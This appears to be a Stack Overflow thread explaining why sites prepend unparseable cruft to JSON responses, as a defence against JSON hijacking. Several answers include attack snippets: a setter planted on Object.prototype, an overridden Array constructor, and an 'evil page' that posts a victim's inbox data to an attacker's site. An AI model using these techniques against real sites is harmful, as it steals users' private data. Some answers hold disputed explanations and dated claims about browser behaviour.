Google returns JSON like this:

throw 1; <dont be evil> { foo: bar}

and Facebook's Ajax returns JSON like this:

for(;;); {"error":0,"errorSummary": ""}
  • Why do they prepend code that would stop execution and make the JSON invalid?
  • How do they parse it if it's invalid and would crash if you tried to eval it?
  • Do they just remove it from the string (seems expensive)?
  • Are there any security advantages to this?

In response to it being for security purposes:

If the scraper is on another domain, they would have to use a script tag to get the data because XHR won't work cross-domain. Even without the for(;;); how would the attacker get the data? It's not assigned to a variable, so wouldn't it just be garbage collected because there are no references to it?

Basically to get the data cross domain they would have to do

<script src="http://target.com/json.js"></script>

But even without the crash script prepended, the attacker can't use any of the JSON data unless it is assigned to a globally accessible variable (it isn't in these cases). The crash code effectively does nothing, because even without it they have to use server-side scripting to use the data on their site.

+5  A: 

How do they parse it if it's invalid and would crash if you tried to eval it?

It's a feature that it would crash if you tried to eval it. eval allows arbitrary JavaScript code, which could be used for a cross-site scripting attack.

Do they just remove it from the string (seems expensive)?

I imagine so. Probably something like:

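function parseJson(json) {
   // Remove the unparseable prefix; same-origin code can read the response as text.
   json = json.replace("throw 1; <dont be evil>", "");
   // isValidJson is a placeholder for a regex (or other check) that validates the JSON.
   if (isValidJson(json)) {
       // The parentheses make eval treat {...} as an object literal, not a block.
       return eval("(" + json + ")");
   } else {
       throw new Error("XSS");
   }
}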

The "don't be evil" cruft prevents developers from using eval directly instead of a more secure alternative.
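A minimal sketch of the same decrufting step without eval, assuming the client knows the exact prefix the server prepends and that a native JSON.parse is available. The names parseCruftedJson and PREFIXES are illustrative, not Google's or Facebook's actual code, and the sketch only handles strict JSON (quoted keys), like the Facebook sample in the question.

```javascript
// Hypothetical helper: strip a known anti-hijacking prefix, then parse strictly.
// The prefixes are the two quoted in the question; real services may use others.
var PREFIXES = ["throw 1; <dont be evil>", "for(;;);"];

function parseCruftedJson(text) {
    for (var i = 0; i < PREFIXES.length; i++) {
        var prefix = PREFIXES[i];
        // Only the start of the string is inspected, so no regex is needed.
        if (text.indexOf(prefix) === 0) {
            text = text.slice(prefix.length);
            break;
        }
    }
    // JSON.parse never executes code; it throws SyntaxError on invalid input.
    return JSON.parse(text);
}

var reply = parseCruftedJson('for(;;); {"error":0,"errorSummary": ""}');
console.log(reply.error);
```

Because the prefix sits at a known position, removing it is a single slice, which addresses the "seems expensive" worry in the question.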

dan04
It's there to prevent using `eval`. Don't try to sidestep it, use a dedicated JSON parser instead!
kibibu
This seems to be closer to the actual purpose than preventing scraping (since either way you need server-side scripting to scrape). +1
Chris T
@kibibu A dedicated JSON parser should throw an error on that though.
Graphain
I'd like to see that regex, if you don't mind. Hint - don't waste time trying to write it `:)`
Kobi
@Kobi Just thinking about it makes me confused, angry, and nauseous :P
Chris T
@dan04 I don't think this XSS attack scenario is realistic. I don't see how this addresses "DOM-based XSS" or even using XHR+XSS to forge requests, which was used by the "Samy worm".
Rook
@dan04 I knew it, this is the wrong answer. I found an explanation from a Google employee.
Rook
A: 

Just another case of superstition. I am sure someone will find a logical-sounding rationalization for it.

ThomasW
It's funny that you say this. The thought crossed my mind, but I think Facebook and Google are a bit smarter than that. The real answer has been posted.
Rook
+6  A: 

EDIT

These strings are commonly referred to as "unparseable cruft", and they are used to patch an information leakage vulnerability that affects the JSON specification. This attack is real: a vulnerability in Gmail was discovered by Jeremiah Grossman. Mozilla also believes this to be a vulnerability in the JSON specification, and it has been patched in Firefox 3. However, because the issue still affects other browsers, the "unparseable cruft" is still required as a compatible patch.

bobince's answer has a technical explanation of this attack and it is correct.

Rook
Now that makes a lot more sense usage-wise, and it explains why sites like Google and Facebook use it (allowing cross-domain requests for gadgets, widgets and what-have-you).
Chris T
This is not the right answer, no matter who gave you the answer. The right answer, in terms of comprehensiveness *and* correctness, is the one given by user bobince at the bottom. Preventing JSON output from a script from being viewed in a browser doesn't even make sense: if it has Content-Type `text/json` it would not even be opened, and if it were `text/[x]html` it would be bad HTML. In no case would the browser execute it if fed as the input document. Crufting is to prevent CSRF attacks and JSON evaluation, because on an attacker's site the Object prototype could be overridden to steal data.
Jesse Dhillon
@Jesse Dhillon bobince may be correct, but his post is missing something: it's not clear how the attacker is able to influence the constructor. I still think this is to protect a cross-domain proxy. For now I'm siding with Google.
Rook
Read http://en.wikipedia.org/wiki/CSRF. I have a site; you come to my site after logging into your JSON-heavy bank website. On my site I have defined the constructor, because it's my site. I embed a cross-domain script tag which OP thought would result in benign objects being immediately discarded, except they aren't. They're captured by my malicious constructor.
Jesse Dhillon
@Jesse Dhillon You should read my profile, and I'm still skeptical.
Rook
@Jesse Dhillon You are right about the content type, but I can't write off a Google employee just yet, especially when bobince's post is missing something. I am unsure how an attacker would go about leveraging the attack that bobince is describing.
Rook
Please pardon me if I offend you, but I find it bordering on unbelievable that someone with your background a) has not tested this out him/herself, b) does not see the truth of it a priori, and c) would accept the explanation that cruft provides security if/when a user receives a JSON snippet as the input document to the browser. I'm sorry to tell you that your answer is wrong, and if you accurately represented the Google employee's response, then he/she is also wrong.
Jesse Dhillon
@Jesse Dhillon I'll admit that I'm not 100% sure about this one. I don't like bobince's answer because it's not an attack scenario. You must admit that you don't have the answer either (yet you gave me a -1). It may be related to CSRF, but as it stands I fail to see how this security mechanism prevents an attacker from obtaining a CSRF token or bypassing a referer check.
Rook
@Jesse Dhillon Look at this exploit that I have written (http://www.exploit-db.com/exploits/7922/). If you can tell me how this XHR attack is related to unparseable cruft, I'll accept that it's CSRF related. Because the security mechanism is written in JS, I'm pretty sure it is XSS related.
Rook
The other answer does show how it protects against a data leakage vulnerability. I don't know if it qualifies as CSRF, but it is definitely a vulnerability/exploit of some kind. It shows using a `<script>` tag and setters/getters to get the data. Putting a prefix like the above would stop this sort of attack. The other answer might be more correct after all.
Chris T
I gave this answer a -1 because I don't believe that the reason is correct, regarding protecting Javascript from being executed if the request URL is accessed directly from the location bar. The rest of this exchange has been great though, my answer is the one I posted just recently and an elaboration of bobince's. Cheers.
Jesse Dhillon
@Chris T Yes, bobince is correct. I didn't agree at first because I wanted to see a real-world attack like this one against Gmail: (http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html)
Rook
Your sample exploit works because it's an XSS attack. That's the reason you would be able to decruft the response, because you've managed to get the code presented from the same domain as the target pligg site. That's different than what's going on with the proposed vulnerability here, where we are decrufting without defeating same-origin through XSS.
Jesse Dhillon
+19  A: 

Even without the for(;;); how would the attacker get the data?

Attacks are based on altering the behaviour of the built-in types, in particular Object and Array, by altering their constructor function or its prototype. Then when the targeted JSON uses a {...} or [...] construct, they'll be the attacker's own versions of those objects, with potentially-unexpected behaviour.

For example, you can hack a setter-property into Object, that would betray the values written in object literals:

Object.prototype.__defineSetter__('x', function(x) {
    alert('Ha! I steal '+x);
});

Then when a <script> was pointed at some JSON that used that property name:

{"x": "hello"}

the value "hello" would be leaked.

The way that array and object literals cause setters to be called is controversial. Firefox removed the behaviour in version 3.5, in response to publicised attacks on high-profile web sites. However at the time of writing Safari (4) and Chrome (5) are still vulnerable to this.
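Whether a given engine still calls inherited setters for object literals can be checked directly. The following is only a sketch: the function name literalTriggersSetter is made up for illustration, and it uses the standard Object.defineProperty in place of __defineSetter__. An engine that follows ECMAScript 5 or later should report that the literal does not leak, while ordinary assignment still goes through the setter.

```javascript
// Hypothetical probe: does an object literal invoke a setter planted on Object.prototype?
function literalTriggersSetter() {
    var leaked = [];
    Object.defineProperty(Object.prototype, "x", {
        configurable: true,                // so the probe can be removed afterwards
        set: function (value) { leaked.push(value); }
    });
    try {
        var viaLiteral = {"x": "hello"};   // the case a hijacked <script> response would hit
        var literalLeaked = leaked.length > 0;

        var plain = {};
        plain.x = "assigned";              // ordinary assignment uses the inherited setter
        var assignmentLeaked = leaked.indexOf("assigned") !== -1;

        return { literalLeaked: literalLeaked, assignmentLeaked: assignmentLeaked };
    } finally {
        delete Object.prototype.x;         // never leave Object.prototype polluted
    }
}

console.log(literalTriggersSetter());
```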

Another attack that all browsers now disallow was to redefine constructor functions:

Array= function() {
    alert('I steal '+this);
};

[1, 2, 3]
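The same kind of check works for the constructor attack. This sketch assumes an environment that provides globalThis; the function name literalUsesGlobalArray is illustrative. It temporarily replaces the global Array, evaluates an array literal, and restores the original right away.

```javascript
// Hypothetical probe: does an array literal call a replaced global Array constructor?
function literalUsesGlobalArray() {
    var original = globalThis.Array;
    var called = false;
    globalThis.Array = function () { called = true; };
    try {
        var sample = [1, 2, 3];          // the literal a hijacked response would contain
        return called;
    } finally {
        globalThis.Array = original;     // restore the real constructor immediately
    }
}

console.log(literalUsesGlobalArray());
```

A result of false means the engine builds literals from its built-in array type regardless of what the global name points to, which is the behaviour the answer describes as now universal.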

And for now, IE8's implementation of properties (based on the ECMAScript Fifth Edition standard and Object.defineProperty) does not work on Object.prototype or Array.prototype.

But as well as protecting past browsers, it may be that extensions to JavaScript cause more potential leaks of a similar kind in future, and in that case chaff should protect against those too.

bobince
Very interesting I never thought of using setters. +1
Chris T
This is absolutely the correct answer and should have been selected for this question.
Jesse Dhillon
How does the attacker influence the constructor? How is this tainted data executed by the client?
Rook
Read about CSRF attacks.
Jesse Dhillon
+1 Yes, bobince is correct. I wanted to see a real-world attack like this one against Gmail: http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html
Rook
+1  A: 

Consider that, after checking your Gmail account, you go visit my evil page:

<script type="text/javascript">
Object = function() {
  ajaxRequestToMyEvilSite(JSON.stringify(this));
}
</script>
<script type="text/javascript" src="http://gmail.com/inbox/listMessage"></script>

What happens now is that the data in the JavaScript code that comes from Google, which the asker thought would be benign and immediately fall out of scope, is actually posted to my evil site. Suppose the URL requested in the script tag returns the following (your browser presents the proper cookie, so Google correctly thinks you are logged in to your inbox):

({
  messages: [
    {
      id: 1,
      subject: 'Super confidential information',
      message: 'Please keep this to yourself: the password is 42'
    },{
      id: 2,
      subject: 'Who stole your password?',
      message: 'Someone knows your password! I told you to keep this information to yourself! And by this information I mean: the password is 42'
    }
  ]
})

Now, I will be posting a serialized version of this object to my evil server. Thank you!

The way to prevent this from happening is to cruft up your JSON responses, and decruft them when you, from the same domain, can manipulate that data. If you like this answer, please accept the one posted by bobince.
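A rough sketch of both halves, under stated assumptions: cruftJson stands for whatever the server does before sending the response, decruftJson for the same-origin client code that reads the body as text, and runsAsScript uses new Function as a stand-in for a cross-domain script tag evaluating the body. All three names are hypothetical, and the prefix is the Google one quoted in the question.

```javascript
// Hypothetical server-side helper: prepend cruft so the body is useless as a <script>.
var CRUFT = "throw 1; <dont be evil>";

function cruftJson(value) {
    return CRUFT + JSON.stringify(value);
}

// Same-origin code receives the body as text (e.g. via XHR) and can remove the prefix.
function decruftJson(body) {
    if (body.indexOf(CRUFT) !== 0) {
        throw new Error("missing cruft prefix");
    }
    return JSON.parse(body.slice(CRUFT.length));
}

// A cross-domain <script> include can only evaluate the body as code.
// new Function stands in for that here: the body fails before any object is built.
function runsAsScript(body) {
    try {
        new Function(body)();
        return true;
    } catch (e) {
        return false;
    }
}

var body = cruftJson({ messages: [{ id: 1, subject: "Super confidential information" }] });
console.log(runsAsScript(body));
console.log(decruftJson(body).messages[0].subject);
```

The for(;;); variant is left out of runsAsScript on purpose, since evaluating it would simply never return.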

Jesse Dhillon
I'm pretty sure Gmail's auth is not based only on cookies, as that would be very, very weak, as you describe here. I think they also incorporate session keys in the URL, which your page can't just intercept.
Dykam
The problem with a site whose target audience is programmers is that every once in a while you will encounter people who are {hope,point,use}lessly pedantic. Try this: a) it's an example of how such an attack could work, not the complete hacker's reference for carrying out attacks against Gmail, and b) as has been pointed out in another answer to this question, a similar attack was demonstrated against Gmail, allowing an attacker to access a user's contact list.
Jesse Dhillon